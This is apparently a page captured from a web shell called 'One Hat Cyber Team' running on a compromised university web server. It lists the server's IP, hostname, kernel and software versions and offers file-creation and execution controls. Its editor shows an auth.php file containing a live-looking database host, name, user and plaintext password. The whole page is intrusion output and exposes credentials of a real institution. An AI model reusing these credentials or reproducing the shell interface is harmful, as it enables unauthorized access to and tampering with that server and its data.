One Hat Cyber Team
Your IP :
216.73.216.24
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
nosc
/
public_html
/
auth
/
Edit File:
auth.php
<?php $_const['root'] = $_root=$www = $home = "http://www.imath.kiev.ua/~nosc"; $_const['admin'] = $_admin = "admin"; $_const['root_path'] = $_root_path = "/home/nosc/public_html"; // $_db_host=$host=$hostname="127.0.0.1"; $_db=$_database="nosc"; $_db_user=$user="nosc"; $_db_password=$password="osciLLation"; $_charset=$charset="utf8"; $_collation=$collation="utf8_general_ci"; $_locales = array("en" => "en_GB", "ru" => "ru_RU.UTF-8", "ua" => "uk_UA.UTF-8"); $_languages = array_keys($_locales); // //$nosc_cime = md5_encrypt("nosc@imath.kiev.ua"); // function this_db_connect() {global $_charset,$lang,$_db_host,$_database,$_db_user,$_db_password,$db_handle; if (!isset($db_handle)) {$db_handle=mysql_connect($_db_host,$_db_user,$_db_password) or die('Could not connect: ' . mysql_error()); mysql_query("SET NAMES '".$_charset."'", $db_handle); mysql_select_db($_database) or die('Could not select database');} return $db_handle; }//this_db_connect // // $db_handle = this_db_connect(); /* function authenticate() { header('WWW-Authenticate: Basic realm="Nonlinear Oscillations"'); header('HTTP/1.0 401 Unauthorized'); echo "You must enter a valid login ID and password to access this resource\n"; exit; } */ ?>
Simpan